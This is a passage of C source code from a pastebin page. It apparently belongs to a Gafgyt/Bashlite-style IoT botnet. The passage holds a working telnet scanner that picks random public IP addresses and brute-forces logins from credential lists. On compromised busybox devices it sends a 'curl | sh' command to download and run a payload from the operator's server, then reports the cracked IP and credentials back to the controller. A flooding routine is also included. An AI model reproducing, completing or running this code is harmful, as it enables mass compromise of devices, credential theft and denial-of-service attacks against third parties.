  831. FD_ZERO(&myset);
  832. FD_SET(fds[i].fd, &myset);
  833. tv.tv_sec = 0;
  834. tv.tv_usec = 10000;
  835. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
  836. if(res == 1)
  837. {
  838. lon = sizeof(int);
  839. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  840. if(valopt)
  841. {
  842. close(fds[i].fd);
  843. fds[i].state = 0;
  844. } else {
  845. fds[i].state = 2;
  846. }
  847. } else if(res == -1)
  848. {
  849. close(fds[i].fd);
  850. fds[i].state = 0;
  851. }
  852. }
  853. break;
  854.  
  855. case 2:
  856. {
  857. //nonblocking sweg
  858. makeRandomStr(watwat, 1024);
  859. if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
  860. {
  861. close(fds[i].fd);
  862. fds[i].state = 0;
  863. }
  864. }
  865. break;
  866. }
  867. }
  868. }
  869. }
  870.  
  871.  
  872.  
  873. void* StartTheLelz(int sockfd)
  874. {
  875. int max = (getdtablesize() / 4) * 3, i, res;
  876. fd_set myset;
  877. struct timeval tv;
  878. socklen_t lon;
  879. int valopt;
  880.  
  881. max = max > 512 ? 512 : max;
  882.  
  883. struct sockaddr_in dest_addr;
  884. dest_addr.sin_family = AF_INET;
  885. dest_addr.sin_port = htons(23);
  886. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  887.  
  888. struct telstate_t
  889. {
  890. int fd;
  891. uint32_t ip;
  892. uint8_t state;
  893. uint8_t complete;
  894. uint8_t usernameInd;
  895. uint8_t passwordInd;
  896. uint32_t totalTimeout;
  897. uint16_t bufUsed;
  898. char *sockbuf;
  899. } fds[max];
  900. memset(fds, 0, max * (sizeof(int) + 1));
  901. for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
  902.  
  903. while(1)
  904. {
  905. for(i = 0; i < max; i++)
  906. {
  907. switch(fds[i].state)
  908. {
  909. case 0:
  910. {
  911. memset(fds[i].sockbuf, 0, 1024);
  912.  
  913. if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
  914. else {
  915. fds[i].passwordInd++;
  916. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
  917. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
  918. }
  919. dest_addr.sin_family = AF_INET;
  920. dest_addr.sin_port = htons(23);
  921. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  922. dest_addr.sin_addr.s_addr = fds[i].ip;
  923. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  924. if(fds[i].fd == -1) { continue; }
  925. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  926. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { sclose(fds[i].fd); fds[i].complete = 1; }
  927. else { fds[i].state = 1; fds[i].totalTimeout = 0; }
  928. }
  929. break;
  930.  
  931. case 1:
  932. {
  933. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
  934.  
  935. FD_ZERO(&myset);
  936. FD_SET(fds[i].fd, &myset);
  937. tv.tv_sec = 0;
  938. tv.tv_usec = 10000;
  939. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
  940. if(res == 1)
  941. {
  942. lon = sizeof(int);
  943. valopt = 0;
  944. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  945. if(valopt)
  946. {
  947. sclose(fds[i].fd);
  948. fds[i].state = 0;
  949. fds[i].complete = 1;
  950. } else {
  951. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  952. fds[i].totalTimeout = 0;
  953. fds[i].bufUsed = 0;
  954. memset(fds[i].sockbuf, 0, 1024);
  955. fds[i].state = 2;
  956. continue;
  957. }
  958. } else if(res == -1)
  959. {
  960. sclose(fds[i].fd);
  961. fds[i].state = 0;
  962. fds[i].complete = 1;
  963. }
  964.  
  965. if(fds[i].totalTimeout + 10 < time(NULL))
  966. {
  967. sclose(fds[i].fd);
  968. fds[i].state = 0;
  969. fds[i].complete = 1;
  970. }
  971. }
  972. break;
  973.  
  974. case 2:
  975. {
  976. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
  977.  
  978. if(readUntil(fds[i].fd, "ogin:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
  979. {
  980. fds[i].totalTimeout = 0;
  981. fds[i].bufUsed = 0;
  982. memset(fds[i].sockbuf, 0, 1024);
  983. fds[i].state = 3;
  984. continue;
  985. } else {
  986. fds[i].bufUsed = strlen(fds[i].sockbuf);
  987. }
  988.  
  989. if(fds[i].totalTimeout + 30 < time(NULL))
  990. {
  991. sclose(fds[i].fd);
  992. fds[i].state = 0;
  993. fds[i].complete = 1;
  994. }
  995. }
  996. break;
  997.  
  998. case 3:
  999. {
  1000. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1001. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1002. fds[i].state = 4;
  1003. }
  1004. break;
  1005.  
  1006. case 4:
  1007. {
  1008. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
  1009.  
  1010. if(readUntil(fds[i].fd, "assword:", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
  1011. {
  1012. fds[i].totalTimeout = 0;
  1013. fds[i].bufUsed = 0;
  1014. if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
  1015. else fds[i].state = 100;
  1016. memset(fds[i].sockbuf, 0, 1024);
  1017. continue;
  1018. } else {
  1019. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
  1020. fds[i].bufUsed = strlen(fds[i].sockbuf);
  1021. }
  1022.  
  1023. if(fds[i].totalTimeout + 30 < time(NULL))
  1024. {
  1025. sclose(fds[i].fd);
  1026. fds[i].state = 0;
  1027. fds[i].complete = 1;
  1028. }
  1029. }
  1030. break;
  1031.  
  1032. case 5:
  1033. {
  1034. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1035. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1036. fds[i].state = 6;
  1037. }
  1038. break;
  1039.  
  1040. case 6:
  1041. {
  1042. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
  1043.  
  1044. if(readUntil(fds[i].fd, "ncorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
  1045. {
  1046. fds[i].totalTimeout = 0;
  1047. fds[i].bufUsed = 0;
  1048. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
  1049. if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1050. else fds[i].state = 7;
  1051. memset(fds[i].sockbuf, 0, 1024);
  1052. continue;
  1053. } else {
  1054. fds[i].bufUsed = strlen(fds[i].sockbuf);
  1055. }
  1056.  
  1057. if(fds[i].totalTimeout + 30 < time(NULL))
  1058. {
  1059. sclose(fds[i].fd);
  1060. fds[i].state = 0;
  1061. fds[i].complete = 1;
  1062. }
  1063. }
  1064. break;
  1065.  
  1066. case 7:
  1067. {
  1068. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1069. fds[i].state = 8;
  1070. }
  1071. break;
  1072.  
  1073. case 8:
  1074. {
  1075. if(send(fds[i].fd, "/bin/busybox;echo -e '\\147\\141\\171\\146\\147\\164'\r\n", 49, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1076. fds[i].state = 9;
  1077. }
  1078. break;
  1079.  
  1080. case 9:
  1081. {
  1082. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
  1083.  
  1084. if(readUntil(fds[i].fd, "gayfgt", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
  1085. {
  1086. send(fds[i].fd, ("curl %s | sh\r\n", getbinariesURL), strlen(("curl %s | sh\r\n", getbinariesURL)), MSG_NOSIGNAL); //Execute getbinaries.sh on our server.
  1087. fds[i].totalTimeout = 0;
  1088. fds[i].bufUsed = 0;
  1089. if(strstr(fds[i].sockbuf, "multi-call") != NULL) Raw(("REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]), sockfd);
  1090. memset(fds[i].sockbuf, 0, 1024);
  1091. sclose(fds[i].fd);
  1092. fds[i].complete = 1;
  1093. //fds[i].lastWorked = 1;
  1094. fds[i].state = 0;
  1095. continue;
  1096. } else {
  1097. fds[i].bufUsed = strlen(fds[i].sockbuf);
  1098. }
  1099.  
  1100. if(fds[i].totalTimeout + 30 < time(NULL))
  1101. {
  1102. sclose(fds[i].fd);
  1103. fds[i].state = 0;
  1104. fds[i].complete = 1;
  1105. }
  1106. }
  1107. break;
  1108.  
  1109. case 100:
  1110. {
  1111. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1112. fds[i].state = 101;
  1113. }
  1114. break;
  1115.  
  1116. case 101:
  1117. {
  1118. if(send(fds[i].fd, "/bin/busybox;echo -e '\\147\\141\\171\\146\\147\\164'\r\n", 49, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
  1119. fds[i].state = 102;
  1120. }
  1121. break;
  1122.  
  1123. case 102:
  1124. {
  1125. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
  1126.  
  1127. if(readUntil(fds[i].fd, "multi-call", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
  1128. {
  1129. fds[i].totalTimeout = 0;
  1130. fds[i].bufUsed = 0;
  1131. Raw(("REPORT %s:%s:", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd]), sockfd);
  1132. sclose(fds[i].fd);
  1133. fds[i].state = 0;
  1134. memset(fds[i].sockbuf, 0, 1024);
  1135. fds[i].complete = 1;
  1136. //fds[i].lastWorked = 1;
  1137. continue;
  1138. } else {
  1139. fds[i].bufUsed = strlen(fds[i].sockbuf);
  1140. }
  1141.  
  1142. if(fds[i].totalTimeout + 30 < time(NULL))
  1143. {
  1144. sclose(fds[i].fd);
  1145. fds[i].state = 0;
  1146. fds[i].complete = 1;
  1147. }
  1148. }
  1149. break;
  1150. }
  1151. }
  1152. }
  1153. }
  1154. in_addr_t getRandomPublicIP()
  1155. {
  1156. if(ipState[1] > 0 && ipState[4] < 255)
  1157. {
  1158. ipState[4]++;
  1159. char ip[16] = {0};
  1160. szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
  1161. return inet_addr(ip);
  1162. }
  1163.  
  1164. ipState[1] = rand() % 255;
  1165. ipState[2] = rand() % 255;
  1166. ipState[3] = rand() % 255;
  1167. ipState[4] = 0;
  1168. while(
  1169. (ipState[1] == 0) ||
  1170. (ipState[1] == 10) ||
  1171. (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
  1172. (ipState[1] == 127) ||
  1173. (ipState[1] == 169 && ipState[2] == 254) ||
  1174. (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
  1175. (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
  1176. (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
  1177. (ipState[1] == 192 && ipState[2] == 168) ||
  1178. (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
  1179. (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
  1180. (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
  1181. (ipState[1] >= 224)
  1182. )
  1183. {
  1184. ipState[1] = rand() % 255;
  1185. ipState[2] = rand() % 255;
  1186. ipState[3] = rand() % 255;
  1187. }
  1188.  
  1189. char ip[16] = {0};
  1190. szprintf(ip, "%d.%d.%d.0", ipState[1], ipState[2], ipState[3]);
  1191. return inet_addr(ip);
  1192. }
  1193. int szprintf(unsigned char *out, const unsigned char *format, ...)
  1194. {
  1195. va_list args;
  1196. va_start( args, format );
  1197. return print( &out, format, args );
  1198. }
  1199. int sclose(int fd)
  1200. {
  1201. if(3 > fd) return 1;
  1202. close(fd);
  1203. return 0;
  1204. }
  1205. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
  1206. {
  1207. int bufferUsed = initialIndex, got = 0, found = 0;
  1208. fd_set myset;
  1209. struct timeval tv;
  1210. tv.tv_sec = timeout;
  1211. tv.tv_usec = timeoutusec;
  1212. unsigned char *initialRead = NULL;
  1213.  
  1214. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
  1215. {
  1216. FD_ZERO(&myset);
  1217. FD_SET(fd, &myset);
  1218. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
  1219. initialRead = buffer + bufferUsed;
  1220. got = recv(fd, initialRead, 1, 0);
  1221. if(got == -1 || got == 0) return 0;
  1222. bufferUsed += got;
  1223. if(*initialRead == 0xFF)
  1224. {
  1225. got = recv(fd, initialRead + 1, 2, 0);
  1226. if(got == -1 || got == 0) return 0;
  1227. bufferUsed += got;
  1228. if(!negotiate(fd, initialRead, 3)) return 0;
  1229. } else {
  1230. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
  1231. }
  1232. }
  1233.  
  1234. if(found) return 1;
  1235. return 0;
  1236. }
  1237. int print(unsigned char **out, const unsigned char *format, va_list args )
  1238. {
  1239. register int width, pad;
  1240. register int pc = 0;
  1241. unsigned char scr[2];
  1242.  
  1243. for (; *format != 0; ++format) {
  1244. if (*format == '%') {
  1245. ++format;
  1246. width = pad = 0;
  1247. if (*format == '\0') break;
  1248. if (*format == '%') goto out;
  1249. if (*format == '-') {
  1250. ++format;
  1251. pad = PAD_RIGHT;
  1252. }
  1253. while (*format == '0') {
  1254. ++format;
  1255. pad |= PAD_ZERO;
  1256. }
  1257. for ( ; *format >= '0' && *format <= '9'; ++format) {
  1258. width *= 10;
  1259. width += *format - '0';
  1260. }
  1261. if( *format == 's' ) {
  1262. register char *s = (char *)va_arg( args, int );
  1263. pc += prints (out, s?s:"(null)", width, pad);
  1264. continue;
  1265. }
  1266. if( *format == 'd' ) {
  1267. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  1268. continue;
  1269. }
  1270. if( *format == 'x' ) {
  1271. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  1272. continue;
  1273. }
  1274. if( *format == 'X' ) {
  1275. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  1276. continue;
  1277. }
  1278. if( *format == 'u' ) {
  1279. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  1280. continue;
  1281. }
  1282. if( *format == 'c' ) {
  1283. scr[0] = (unsigned char)va_arg( args, int );
  1284. scr[1] = '\0';
  1285. pc += prints (out, scr, width, pad);
  1286. continue;
  1287. }
  1288. }
  1289. else {
  1290. out:
  1291. printchar (out, *format);
  1292. ++pc;
  1293. }
  1294. }
  1295. if (out) **out = '\0';
  1296. va_end( args );
  1297. return pc;
  1298. }
  1299. int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
  1300. {
  1301. unsigned char print_buf[PRINT_BUF_LEN];
  1302. register unsigned char *s;
  1303. register int t, neg = 0, pc = 0;
  1304. register unsigned int u = i;
  1305.  
  1306. if (i == 0) {
  1307. print_buf[0] = '0';
  1308. print_buf[1] = '\0';
  1309. return prints (out, print_buf, width, pad);
  1310. }
  1311.  
  1312. if (sg && b == 10 && i < 0) {
  1313. neg = 1;
  1314. u = -i;
  1315. }
  1316.  
  1317. s = print_buf + PRINT_BUF_LEN-1;
  1318. *s = '\0';
  1319.  
  1320. while (u) {
  1321. t = u % b;
  1322. if( t >= 10 )
  1323. t += letbase - '0' - 10;
  1324. *--s = t + '0';
  1325. u /= b;
  1326. }
  1327.  
  1328. if (neg) {
  1329. if( width && (pad & PAD_ZERO) ) {
  1330. printchar (out, '-');
  1331. ++pc;
  1332. --width;
  1333. }
  1334. else {
  1335. *--s = '-';
  1336. }
  1337. }
  1338.  
  1339. return pc + prints (out, s, width, pad);
  1340. }
  1341. int negotiate(int sock, unsigned char *buf, int len)
  1342. {
  1343. unsigned char c;
  1344.  
  1345. switch (buf[1]) {
  1346. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
  1347. case CMD_WILL:
  1348. case CMD_WONT:
  1349. case CMD_DO:
  1350. case CMD_DONT:
  1351. c = CMD_IAC;
  1352. send(sock, &c, 1, MSG_NOSIGNAL);
  1353. if (CMD_WONT == buf[1]) c = CMD_DONT;
  1354. else if (CMD_DONT == buf[1]) c = CMD_WONT;
  1355. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
  1356. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
  1357. send(sock, &c, 1, MSG_NOSIGNAL);
  1358. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  1359. break;
  1360.  
  1361. default:
  1362. break;
  1363. }
  1364.  
  1365. return 0;
  1366. }
  1367.  
  1368. int matchPrompt(char *bufStr)
  1369. {
  1370. char *prompts = ":>%$#\0";
  1371.  
  1372. int bufLen = strlen(bufStr);
  1373. int i, q = 0;
  1374. for(i = 0; i < strlen(prompts); i++)
  1375. {
  1376. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
  1377. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
  1378. }
  1379.  
  1380. return 0;
  1381. }
  1382. void printchar(unsigned char **str, int c)
  1383. {
  1384. if (str) {
  1385. **str = c;
  1386. ++(*str);
  1387. }
  1388. else (void)write(1, &c, 1);
  1389. }
  1390.  
  1391. int prints(unsigned char **out, const unsigned char *string, int width, int pad)
  1392. {
  1393. register int pc = 0, padchar = ' ';
  1394.  
  1395. if (width > 0) {
  1396. register int len = 0;
  1397. register const unsigned char *ptr;
  1398. for (ptr = string; *ptr; ++ptr) ++len;
  1399. if (len >= width) width = 0;
  1400. else width -= len;
  1401. if (pad & PAD_ZERO) padchar = '0';
  1402. }
  1403. if (!(pad & PAD_RIGHT)) {
  1404. for ( ; width > 0; --width) {
  1405. printchar (out, padchar);
  1406. ++pc;
  1407. }
  1408. }
  1409. for ( ; *string ; ++string) {
  1410. printchar (out, *string);
  1411. ++pc;
  1412. }
  1413. for ( ; width > 0; --width) {
  1414. printchar (out, padchar);
  1415. ++pc;
  1416. }
  1417.  
  1418. return pc;
  1419. }
  1420. char** str_split(char* a_str, const char a_delim)
  1421. {
  1422. char** result = 0;
  1423. size_t count = 0;
  1424. char* tmp = a_str;
  1425. char* last_comma = 0;
  1426. char delim[2];
  1427. delim[0] = a_delim;
  1428. delim[1] = 0;
  1429.  
  1430. /* Count how many elements will be extracted. */
  1431. while (*tmp)
  1432. {
  1433. if (a_delim == *tmp)
  1434. {
  1435. count++;
  1436. last_comma = tmp;
  1437. }
  1438. tmp++;
  1439. }
  1440.  
  1441. /* Add space for trailing token. */
  1442. count += last_comma < (a_str + strlen(a_str) - 1);
  1443.  
  1444. /* Add space for terminating null string so caller
  1445. knows where the list of returned strings ends. */
  1446. count++;
  1447.  
  1448. result = malloc(sizeof(char*) * count);
  1449.  
  1450. if (result)
  1451. {
  1452. size_t idx = 0;
  1453. char* token = strtok(a_str, delim);
  1454.  
  1455. while (token)
  1456. {
  1457. assert(idx < count);
  1458. *(result + idx++) = strdup(token);
  1459. token = strtok(0, delim);
  1460. }
  1461. assert(idx == count - 1);
  1462. *(result + idx) = 0;
  1463. }
  1464.  
  1465. return result;
  1466. }
  1467. bool prefix(const char *pre, const char *str)
  1468. {
  1469. return strncmp(pre, str, strlen(pre)) == 0;
  1470. }
  1471. int getHost(unsigned char *toGet, struct in_addr *i)
  1472. {
  1473. struct hostent *h;
  1474. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  1475. return 0;
  1476. }
  1477. void makeRandomStr(unsigned char *buf, int length)
  1478. {
  1479. int i = 0;
  1480. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  1481. }
  1482. uint32_t rand_cmwc(void)
  1483. {
  1484. uint64_t t, a = 18782LL;
  1485. static uint32_t i = 4095;
  1486. uint32_t x, r = 0xfffffffe;
  1487. i = (i + 1) & 4095;
  1488. t = a * Q[i] + c;
  1489. c = (uint32_t)(t >> 32);
  1490. x = t + c;
  1491. if (x < c) {
  1492. x++;
  1493. c++;
  1494. }
  1495. return (Q[i] = r - x);
  1496. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!